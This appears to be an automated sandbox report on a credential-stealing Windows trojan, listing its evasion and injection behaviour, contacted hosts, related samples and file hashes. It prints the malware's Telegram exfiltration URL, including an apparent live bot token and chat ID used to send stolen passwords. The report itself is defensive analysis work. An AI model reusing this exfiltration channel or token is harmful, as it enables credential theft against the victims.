Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph (ID: 1580751, Sample: INQUIRY.exe, Startdate: 26/12/2024, Architecture: WINDOWS, Score: 100)

Start node:
- Contacts: reallyfreegeoip.org; api.telegram.org; 2 other IPs or domains
- Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures
- Starts: INQUIRY.exe

Signatures attached to contacted domains:
- reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)
- api.telegram.org: Uses the Telegram API (likely for C&C communication)

INQUIRY.exe (first instance, started by the start node):
- Signatures: Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Switches to a custom stack to bypass stack traces
- Starts: INQUIRY.exe (second instance); RegSvcs.exe

INQUIRY.exe (second instance):
- Signatures: Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Maps a DLL or memory area into another process
- Starts: RegSvcs.exe

RegSvcs.exe (started by the second INQUIRY.exe instance):
- Network: api.telegram.org 149.154.167.220 (ports 443, 49739), TELEGRAMRU, United Kingdom; checkip.dyndns.com 193.122.6.168 (ports 49731, 80), ORACLE-BMC-31898US, United States; reallyfreegeoip.org 172.67.177.134 (ports 443, 49733), CLOUDFLARENETUS, United States
- Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

Source | Detection | Scanner | Label
INQUIRY.exe | 45% | Virustotal |
INQUIRY.exe | 47% | ReversingLabs | Win32.Trojan.Nymeria
INQUIRY.exe | 100% | Joe Sandbox ML |
              No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 172.67.177.134 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 193.122.6.168 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://checkip.dyndns.org/ | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation (one URL per entry; sources are the RegSvcs.exe memory dumps the string was found in)

https://api.telegram.org (malicious: false, reputation: high)
  Source: RegSvcs.exe, 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp
https://api.telegram.org/bot (malicious: false, reputation: high)
  Source: RegSvcs.exe, 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp
https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839 (malicious: false, reputation: high)
  Source: RegSvcs.exe, 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp
http://checkip.dyndns.org/q (malicious: false, reputation: high)
  Source: RegSvcs.exe, 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp; RegSvcs.exe, 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp; RegSvcs.exe, 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp
http://reallyfreegeoip.org (malicious: false, reputation: high)
  Source: RegSvcs.exe, 00000003.00000002.4150460368.000000000308D000.00000004.00000800.00020000.00000000.sdmp
https://reallyfreegeoip.org (malicious: false, reputation: high)
  Source: RegSvcs.exe, 00000003.00000002.4150460368.000000000306C000.00000004.00000800.00020000.00000000.sdmp
http://checkip.dyndns.org (malicious: false, reputation: high)
  Source: RegSvcs.exe, 00000003.00000002.4150460368.000000000306C000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000003.00000002.4150460368.0000000003060000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp
http://checkip.dyndns.com (malicious: false, reputation: high)
  Source: RegSvcs.exe, 00000003.00000002.4150460368.000000000306C000.00000004.00000800.00020000.00000000.sdmp
http://api.telegram.org (malicious: false, reputation: high)
  Source: RegSvcs.exe, 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name (malicious: false, reputation: high)
  Source: RegSvcs.exe, 00000003.00000002.4150460368.0000000002FE9000.00000004.00000800.00020000.00000000.sdmp
https://api.telegram.org/bot-/sendDocument?chat_id= (malicious: false, reputation: high)
  Source: RegSvcs.exe, 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp; RegSvcs.exe, 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp; RegSvcs.exe, 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp
https://reallyfreegeoip.org/xml/ (malicious: false, reputation: high)
  Source: RegSvcs.exe, 00000003.00000002.4150460368.000000000306C000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp; RegSvcs.exe, 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp; RegSvcs.exe, 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
172.67.177.134 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1580751
                                                    Start date and time:2024-12-26 02:44:05 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 8m 40s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:8
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:INQUIRY.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/6@3/3
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:
                                                    • Successful, ratio: 98%
                                                    • Number of executed functions: 58
                                                    • Number of non-executed functions: 274
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                    • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
20:45:24 | API Interceptor | 10055287x Sleep call for process: RegSvcs.exe modified
Related samples by IP (Match: Associated Sample Name, Detection, Threat Name, Context)

149.154.167.220
- cMTqzvmx9u.exe: malicious; LummaC, Amadey, LummaC Stealer, RedLine
- Technonomic.exe: malicious; GuLoader, Snake Keylogger, VIP Keylogger
- Proforma Invoice.exe: malicious; MassLogger RAT
- Azygoses125.exe: malicious; GuLoader, Snake Keylogger, VIP Keylogger
- tg.exe: malicious; Babadeda
- tg.exe: malicious; Babadeda
- setup.exe: malicious; Babadeda
- file.exe: malicious; LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
- user.exe: malicious; Unknown
- file.exe: malicious; LummaC, Amadey, LummaC Stealer, Xmrig

193.122.6.168
- Technonomic.exe: malicious; GuLoader, Snake Keylogger, VIP Keylogger; context: checkip.dyndns.org/
- HALKBANK EKSTRE.exe: malicious; MassLogger RAT; context: checkip.dyndns.org/
- EPIRTURMEROOO0060.exe: malicious; MassLogger RAT; context: checkip.dyndns.org/
- Proforma Invoice.exe: malicious; MassLogger RAT; context: checkip.dyndns.org/
- HUBED342024.exe: malicious; MassLogger RAT; context: checkip.dyndns.org/
- YU SV Payment.exe: malicious; MassLogger RAT; context: checkip.dyndns.org/
- PAYMENT ADVICE 750013-1012449943-81347-pdf.exe: malicious; GuLoader, MassLogger RAT; context: checkip.dyndns.org/
- PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe: malicious; GuLoader, MassLogger RAT; context: checkip.dyndns.org/
- Invoice.exe: malicious; Snake Keylogger; context: checkip.dyndns.org/
- MV GOLDEN SCHULTE DETAILS.exe: malicious; Snake Keylogger; context: checkip.dyndns.org/

172.67.177.134
- Technonomic.exe: malicious; GuLoader, Snake Keylogger, VIP Keylogger
- HALKBANK EKSTRE.exe: malicious; MassLogger RAT
- EPIRTURMEROOO0060.exe: malicious; MassLogger RAT
- HUBED342024.exe: malicious; MassLogger RAT
- Order_12232024.exe: malicious; MassLogger RAT
- rTTSWIFTCOPIES.exe: malicious; MassLogger RAT
- Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe: malicious; MassLogger RAT
- YU SV Payment.exe: malicious; MassLogger RAT
- PAYMENT ADVICE 750013-1012449943-81347-pdf.exe: malicious; GuLoader, MassLogger RAT
- HUSDGHCE23ED.exe: malicious; MassLogger RAT
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            checkip.dyndns.comTechnonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 193.122.6.168
HALKBANK EKSTRE.exe | malicious | MassLogger RAT | 193.122.6.168
EPIRTURMEROOO0060.exe | malicious | MassLogger RAT | 193.122.6.168
Proforma Invoice.exe | malicious | MassLogger RAT | 193.122.6.168
Azygoses125.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 132.226.8.169
HUBED342024.exe | malicious | MassLogger RAT | 193.122.6.168
PARATRANSFARI REMINDER.exe | malicious | Snake Keylogger | 132.226.8.169
MT Eagle Asia 11.exe | malicious | Snake Keylogger | 193.122.130.0
Order_12232024.exe | malicious | MassLogger RAT | 193.122.130.0
rTTSWIFTCOPIES.exe | malicious | MassLogger RAT | 193.122.130.0

Match: api.telegram.org
Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
Proforma Invoice.exe | malicious | MassLogger RAT | 149.154.167.220
Azygoses125.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
tg.exe | malicious | Babadeda | 149.154.167.220
tg.exe | malicious | Babadeda | 149.154.167.220
setup.exe | malicious | Babadeda | 149.154.167.220
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 149.154.167.220
user.exe | malicious | Unknown | 149.154.167.220
file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | 149.154.167.220
file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | 149.154.167.220

Match: reallyfreegeoip.org
Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 172.67.177.134
HALKBANK EKSTRE.exe | malicious | MassLogger RAT | 172.67.177.134
EPIRTURMEROOO0060.exe | malicious | MassLogger RAT | 172.67.177.134
Proforma Invoice.exe | malicious | MassLogger RAT | 104.21.67.152
Azygoses125.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.67.152
HUBED342024.exe | malicious | MassLogger RAT | 172.67.177.134
PARATRANSFARI REMINDER.exe | malicious | Snake Keylogger | 104.21.67.152
MT Eagle Asia 11.exe | malicious | Snake Keylogger | 104.21.67.152
Order_12232024.exe | malicious | MassLogger RAT | 172.67.177.134
rTTSWIFTCOPIES.exe | malicious | MassLogger RAT | 172.67.177.134
Associated Sample Name / URL | Detection | Threat Name | Context

Match: ORACLE-BMC-31898US
armv4l.elf | malicious | Mirai | 129.148.142.134
Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 193.122.6.168
HALKBANK EKSTRE.exe | malicious | MassLogger RAT | 193.122.6.168
splm68k.elf | malicious | Unknown | 129.147.168.111
EPIRTURMEROOO0060.exe | malicious | MassLogger RAT | 193.122.6.168
Proforma Invoice.exe | malicious | MassLogger RAT | 193.122.6.168
HUBED342024.exe | malicious | MassLogger RAT | 193.122.6.168
MT Eagle Asia 11.exe | malicious | Snake Keylogger | 193.122.130.0
Order_12232024.exe | malicious | MassLogger RAT | 193.122.130.0
rTTSWIFTCOPIES.exe | malicious | MassLogger RAT | 193.122.130.0

Match: TELEGRAMRU
PodcastsTries.exe | malicious | Vidar | 149.154.167.99
cMTqzvmx9u.exe | malicious | LummaC, Amadey, LummaC Stealer, RedLine | 149.154.167.220
Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
Proforma Invoice.exe | malicious | MassLogger RAT | 149.154.167.220
Azygoses125.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
ChoForgot.exe | malicious | Vidar | 149.154.167.99
YYjRtxS70h.exe | malicious | Unknown | 149.154.167.99
YYjRtxS70h.exe | malicious | Unknown | 149.154.167.99
gVKsiQIHqe.exe | malicious | Vidar | 149.154.167.99
trZG6pItZj.exe | malicious | Vidar | 149.154.167.99

Match: CLOUDFLARENETUS
https://webmail.buzja.com/?auth=byoungjo.yoo@hyundaimovex.com | malicious | HTMLPhisher | 172.67.167.59
Set-up.exe | malicious | LummaC | 172.67.214.186
setup.exe | malicious | LummaC | 172.67.151.193
Set-up.exe | malicious | LummaC Stealer | 172.67.158.190
SET_UP.exe | malicious | LummaC | 104.21.89.250
F3ePjP272h.exe | malicious | DCRat, PureLog Stealer, zgRAT | 172.67.220.198
00000.ps1 | malicious | LummaC | 104.21.38.253
https://fsharetv.co/ | malicious | Unknown | 172.67.131.140
123.ps1 | malicious | LummaC | 104.21.90.105
Associated Sample Name / URL | Detection | Threat Name | Context

Match: 54328bd36c14bd82ddaa0c04b25ed9ad
Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 172.67.177.134
HALKBANK EKSTRE.exe | malicious | MassLogger RAT | 172.67.177.134
EPIRTURMEROOO0060.exe | malicious | MassLogger RAT | 172.67.177.134
Proforma Invoice.exe | malicious | MassLogger RAT | 172.67.177.134
Azygoses125.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 172.67.177.134
HUBED342024.exe | malicious | MassLogger RAT | 172.67.177.134
PARATRANSFARI REMINDER.exe | malicious | Snake Keylogger | 172.67.177.134
MT Eagle Asia 11.exe | malicious | Snake Keylogger | 172.67.177.134
Order_12232024.exe | malicious | MassLogger RAT | 172.67.177.134
rTTSWIFTCOPIES.exe | malicious | MassLogger RAT | 172.67.177.134

Match: 3b5074b1b5d032e5620f69f9f700ff0e
00000.ps1 | malicious | LummaC | 149.154.167.220
123.ps1 | malicious | LummaC | 149.154.167.220
PodcastsTries.exe | malicious | Vidar | 149.154.167.220
wUSt04rfJ0.exe | malicious | Quasar | 149.154.167.220
#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1 | malicious | Unknown | 149.154.167.220
gYjK72gL17.exe | malicious | Stealc, Vidar | 149.154.167.220
Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
Gq48hjKhZf.exe | malicious | LodaRAT | 149.154.167.220
Gq48hjKhZf.exe | malicious | Unknown | 149.154.167.220
                                                                                            No context
                                                                                            Process:C:\Users\user\Desktop\INQUIRY.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):204068
                                                                                            Entropy (8bit):7.985333362045498
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:mrlA2rxhV0hsHAl2kQZe/LFw8zERPwp3o72cfWwVmR9LdZadjJYVNQ3mCJURkajg:WR7AtpwfYp3o79VmRBQjJ+Q3mGU3g
                                                                                            MD5:3421F08B15AE56A44953DC2A78073510
                                                                                            SHA1:E82E8801163AAF8DEB66071C526F3E3A95684C11
                                                                                            SHA-256:9511A309031269A6C561032C635F132FEC93F984AB444771F3C53D84B6D1F73B
                                                                                            SHA-512:C10EA4765F849C30CAC4A50572EE21A1AF08FE61B2C0935B95508978441111361520EE0BB26DD5AB75D0B8A9A7FD6B27D2707132427B62D25163202730692850
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:EA06..2...9..m"gQ..fu...4.Ri..%J.J.L).....X...SI...k....P.X.S|.J.....zg....;+....G ....9|..>..j3[L._Z.H$V..v.j...R..ri_..,fI_._...:.9...N..`..s.4.....t.$.? .J........M...t..i.......H.Y&[.U.A/..${.....4...........7Z..=.V.....L-...BaU..).:.j.-]p..E`........iY..*..Ut.c3`..s..*.:.0...5..Vg...@...R.U...f$`&..W.S....5..:.*..W.4..?.Z...[..,.N.;........9T../.;$.N....S.E.V.@..BeQ..@.>...(...J<.C.V@....a$.,:. ....R.B..I|..,|....RmI.V@...h...Ri..T.S8.......3.R.u.0..o..y|...j.........(=.a...).M..AX..S>.f.6..hy...3..Q<Q.VS.....\..9......#...w.Ri.o..k.:.;...`..=.#=..e?.X$^....T.......~I^...R..N0.q0.D.3@...].^.....f...L2..T..Wo..N.a..U...........'.#..(...[...f....I...j......`.......[$u..f/X.q.@.D~5....w..2...._X...Q..x..]CsY..f.j..An...T.e.!i..)~N5...XO<.......n9sJO2mL.v...~.oq...T.d;.........K..`<......K/rZ......A..<.c(.......Q...zM&...rv...g-..rZ~.=..h..H..,.....P..4>.&iH.S..k.z...m...4....a..i.$.q.`y.I......@s...%..sd...oc....;.d.7..V.|..?...S...M..1
                                                                                            Process:C:\Users\user\Desktop\INQUIRY.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):9650
                                                                                            Entropy (8bit):7.598242512517557
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:c09SJLZ7jNO7shYbDpxJ6RVpqWek6eHKIeeha0a1RgOKsUmIdy41hjGjRUuiTzCT:X9SJtjub0Lb9K+hda1C/MIc0qjuuiTzw
                                                                                            MD5:E6114AD1542DDB63F474D33C6263F1D6
                                                                                            SHA1:611B0088405B3598B51300107F27ABA16E778928
                                                                                            SHA-256:49C5AA4F1CDF2722CD20602DF79AED81E2AF677DC188680944649D1587768108
                                                                                            SHA-512:C954F96C008A7B3BE4B968323A42F47E994A9238EA7861099BE56707EA4B39CA4583D446E64F28EDC71A82F55E1214DAACFB3403C16EF8DFFBF46104BEEA8CB6
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:EA06..p..L&.[...e....;..`....y...b.......s8..&...j.%.$.m8..Sp.N.g.....m.X@..K...c.$....lL.`..Ng6)...l.I...b....4..,S@..l.l.-z..f.6|v...Qc.0.......q4.Y..k..h......c ._..p.1....qa.H....9..$l.3..Y@.6...$.a5.H.f@.....|3....fs9..%d.M...5...&.@.@.K.I.....Y.x>9.....Y.j.;.......j.;-....Y@j.9.....K,..1...'.`....|.....,S`..N,`...H.......|....F. ,_...c3..........;..:&.>_L.n....f.G_T......|.).......&.....8...&V....ia...=.....Y......&..`.l..|.[.....Yl ....ab...,@....ib........h.._..@...3|.P.o.ac.....+.....N.i|sk....8..4|.0...c....7....k ..7.X..TD....M&`....g....,,`....>.Y...$.@&....L&.P.....32.|&.G%......h...,..33.%.....BS...Nf......f.4.L,.9."....Bvp.Y...ffS{$..d..,.@8@.......@.3d.L..k4.h..M.B:.Y...fg6.;.ab....98.L..:.....of.L.*..Fp........36.Y&.k,.b...' !...,t.33.4.c2.X.M....#......j.d...[..%3.....c....M'6...ic....!..,..3 k..p....@...L&..........., ....#......f.8.X..K..`....zn........0{.k7....!..,...S.%..9..J@^@.G'.......aa.M..)LM@B:.Y...ffS...r....@...N@.:.....n..Mf@....
                                                                                            Process:C:\Users\user\Desktop\INQUIRY.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):204068
                                                                                            Entropy (8bit):7.985333362045498
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:mrlA2rxhV0hsHAl2kQZe/LFw8zERPwp3o72cfWwVmR9LdZadjJYVNQ3mCJURkajg:WR7AtpwfYp3o79VmRBQjJ+Q3mGU3g
                                                                                            MD5:3421F08B15AE56A44953DC2A78073510
                                                                                            SHA1:E82E8801163AAF8DEB66071C526F3E3A95684C11
                                                                                            SHA-256:9511A309031269A6C561032C635F132FEC93F984AB444771F3C53D84B6D1F73B
                                                                                            SHA-512:C10EA4765F849C30CAC4A50572EE21A1AF08FE61B2C0935B95508978441111361520EE0BB26DD5AB75D0B8A9A7FD6B27D2707132427B62D25163202730692850
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:EA06..2...9..m"gQ..fu...4.Ri..%J.J.L).....X...SI...k....P.X.S|.J.....zg....;+....G ....9|..>..j3[L._Z.H$V..v.j...R..ri_..,fI_._...:.9...N..`..s.4.....t.$.? .J........M...t..i.......H.Y&[.U.A/..${.....4...........7Z..=.V.....L-...BaU..).:.j.-]p..E`........iY..*..Ut.c3`..s..*.:.0...5..Vg...@...R.U...f$`&..W.S....5..:.*..W.4..?.Z...[..,.N.;........9T../.;$.N....S.E.V.@..BeQ..@.>...(...J<.C.V@....a$.,:. ....R.B..I|..,|....RmI.V@...h...Ri..T.S8.......3.R.u.0..o..y|...j.........(=.a...).M..AX..S>.f.6..hy...3..Q<Q.VS.....\..9......#...w.Ri.o..k.:.;...`..=.#=..e?.X$^....T.......~I^...R..N0.q0.D.3@...].^.....f...L2..T..Wo..N.a..U...........'.#..(...[...f....I...j......`.......[$u..f/X.q.@.D~5....w..2...._X...Q..x..]CsY..f.j..An...T.e.!i..)~N5...XO<.......n9sJO2mL.v...~.oq...T.d;.........K..`<......K/rZ......A..<.c(.......Q...zM&...rv...g-..rZ~.=..h..H..,.....P..4>.&iH.S..k.z...m...4....a..i.$.q.`y.I......@s...%..sd...oc....;.d.7..V.|..?...S...M..1
                                                                                            Process:C:\Users\user\Desktop\INQUIRY.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):9650
                                                                                            Entropy (8bit):7.598242512517557
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:c09SJLZ7jNO7shYbDpxJ6RVpqWek6eHKIeeha0a1RgOKsUmIdy41hjGjRUuiTzCT:X9SJtjub0Lb9K+hda1C/MIc0qjuuiTzw
                                                                                            MD5:E6114AD1542DDB63F474D33C6263F1D6
                                                                                            SHA1:611B0088405B3598B51300107F27ABA16E778928
                                                                                            SHA-256:49C5AA4F1CDF2722CD20602DF79AED81E2AF677DC188680944649D1587768108
                                                                                            SHA-512:C954F96C008A7B3BE4B968323A42F47E994A9238EA7861099BE56707EA4B39CA4583D446E64F28EDC71A82F55E1214DAACFB3403C16EF8DFFBF46104BEEA8CB6
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:EA06..p..L&.[...e....;..`....y...b.......s8..&...j.%.$.m8..Sp.N.g.....m.X@..K...c.$....lL.`..Ng6)...l.I...b....4..,S@..l.l.-z..f.6|v...Qc.0.......q4.Y..k..h......c ._..p.1....qa.H....9..$l.3..Y@.6...$.a5.H.f@.....|3....fs9..%d.M...5...&.@.@.K.I.....Y.x>9.....Y.j.;.......j.;-....Y@j.9.....K,..1...'.`....|.....,S`..N,`...H.......|....F. ,_...c3..........;..:&.>_L.n....f.G_T......|.).......&.....8...&V....ia...=.....Y......&..`.l..|.[.....Yl ....ab...,@....ib........h.._..@...3|.P.o.ac.....+.....N.i|sk....8..4|.0...c....7....k ..7.X..TD....M&`....g....,,`....>.Y...$.@&....L&.P.....32.|&.G%......h...,..33.%.....BS...Nf......f.4.L,.9."....Bvp.Y...ffS{$..d..,.@8@.......@.3d.L..k4.h..M.B:.Y...fg6.;.ab....98.L..:.....of.L.*..Fp........36.Y&.k,.b...' !...,t.33.4.c2.X.M....#......j.d...[..%3.....c....M'6...ic....!..,..3 k..p....@...L&..........., ....#......f.8.X..K..`....zn........0{.k7....!..,...S.%..9..J@^@.G'.......aa.M..)LM@B:.Y...ffS...r....@...N@.:.....n..Mf@....
                                                                                            Process:C:\Users\user\Desktop\INQUIRY.exe
                                                                                            File Type:ASCII text, with very long lines (28674), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):28674
                                                                                            Entropy (8bit):3.5800040611229567
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:G3i/OSyPUeVEZwkOEOsjwp5Js6GUL1vl1+fnd1uLphM:UiWSyPUJWkOvsduLDM
                                                                                            MD5:3CAD5BF1A8339A6018D5F2FE71094216
                                                                                            SHA1:90AF0D2C0BC3AE1AA9F6ED09F8167DE5502B5AA3
                                                                                            SHA-256:497179D433DE315AD82F4006A5EF0C214993692E1AA13CB4F4C8D90406A70B48
                                                                                            SHA-512:8B926DA3EE6D5448C906E0E73E22FFDE62B52F79A0E3E372678300A7340D919F1E0688D7F3FAAE0413F55BE59764EAE708EDFAE1B2EAE70E7A35A0B5961FD323
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview: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
Process: C:\Users\user\Desktop\INQUIRY.exe
File Type: data
Category: dropped
Size (bytes): 209408
Entropy (8bit): 7.861069779097261
Encrypted: false
SSDEEP: 3072:ZRbvSm21cUSpdMmGIUrTktO2g8KXC7HUwZdZRNJgFK71IYInRmt8xDsAxIbTrt9p:fbv+/QrawoXWHVZRNuk71Ihm6uYalyW
MD5: 1245CACED7126DBBC93E4D1593403B59
SHA1: FD14755FC9163BAB14D3BFD0FCDA15466E9697A3
SHA-256: 448ED4DF2A1D973AB7B479D8F63D636E8B8E0755551B5AF34E0DDEB6F61CC24D
SHA-512: 4725C5360B8571795192C95593C2F8B744F809B1040602BE64CB2E54C52AD047DC5E24DF740E420B7CF75CD236D6697C79E1865E2981A5A519CCEEAAA71CAB7D
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.050074996630016
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: INQUIRY.exe
File size: 1'091'584 bytes
MD5: ba7b76b0763b1488a2aee0892bdbbf12
SHA1: 630f66e0cde7e6830c24f51afc7f811c422a4ca7
SHA256: 7d0dd6fef8949eb3e2a88946865f6c8cdd4444ea224a99caa547f3ce68cf5299
SHA512: a72f4cfedc1788c5856ee204b17dd63121103745a99a56a9816602ffe087f2413e6f31c52ad8b104b6cd136f728d5df5ecc8fbb0a99c18651fedf8f5ecf3aa87
SSDEEP: 24576:Ku6J33O0c+JY5UZ+XC0kGso6Fa551JrczeXcwC8/WY:8u0c++OCvkGs9Fa5fJD4HY
TLSH: 1D35BE2273DDC360CB669173BF69B7016EBF7C614630B85B2F880D7DA950162162DBA3
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x427dcd
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x676C9E6D [Thu Dec 26 00:08:13 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: afcdf79be1557326c854b6e20cb900a7
Instruction
call 00007F2530535B9Ah
jmp 00007F2530528964h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F2530528AEAh
cmp edi, eax
jc 00007F2530528E4Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F2530528AE9h
rep movsb
jmp 00007F2530528DFCh
cmp ecx, 00000080h
jc 00007F2530528CB4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F2530528AF0h
bt dword ptr [004BE324h], 01h
jc 00007F2530528FC0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F2530528C8Dh
test edi, 00000003h
jne 00007F2530528C9Eh
